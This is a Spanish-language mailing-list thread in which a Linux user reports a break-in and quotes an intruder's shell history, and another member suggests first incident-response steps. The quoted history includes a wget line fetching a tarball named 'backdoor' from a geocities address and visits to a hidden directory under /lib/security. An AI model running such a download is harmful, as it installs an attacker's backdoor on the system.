Re: Fui atacado]

[SoTaNeZ <sotanez@telefonica.net>]

==> nada de fecha 18 de febrero en el syslog. Luego hice un history y me
==> aparecio esto que por su puesto yo no lo hice(màs raro aun):
==> 
==>  484  cat /etc/issue
==>   485  ps
==>   486  bash
==>   487  /usr/sbin:/sbin:/usr/bin:/bin:/lib/security/.config/bin
==>   488  netstat -a
==>   489  cd /lib/security/.config/bin
==>   490  cd /lib/security/.config
==>   491  dir
==>   492  cd ssh
==>   493  dir
==>   494  cd ..
==>   495  wget http://www.gwydiondylan.org/downloads/binaries/linux/x86 496
==>  /tar/gwydion-dylan-2.3.10-x86-linux.tar.gz
==>   497  wget
==> http://www.gwydiondylan.org/downloads/binaries/linux/x86/tar/gwydion-dylan-2.3.10-x86-linux.tar.gz
==>   498  wget geocities.com/s3rjiu/backdoor/ser.tar.gz
==> 
==> Esto paquete porsuesto no los baje.

Parece que se han colado en tu ordenador y se han bajado un backdoor de esos (y no ha borrado el historial, animalito). Pues yo me iría para empezar a la pagina de la que se ha bajado el backdoor, para ver que es lo que hace, y conectate a internet lo menos posible, y pon un firewall que bloquee practicamente todo menos lo necesario. Mira los servicios abiertos a internet y el kernel, a ver que vulnerabilidades tienen. También te puedes bajar el manual análisis forense en linux o algo así que esta en es.tldp.org. Y si quieres una lista mejorcita pues apuntate a la lista hackindex (busca en google la web).
==> 
==> Ah hago un ps y no sale nada, me dice esto:
==> Violación de segmento

Vaya, eso igual lo ha echo el troyano.
No soy ningún experto, asi que no puedo ayudar más, saludos.

==> Cual es la inseguridad que tengo?
==> 
==> Gracias y saludos......
==> 
==> -- 
==> Federico Contreras
==> T.S.U. en Informática
==> U.D.O.
==> 
-- 
"No hay nada peor que ser vulgar"
sotanez@jabber.cn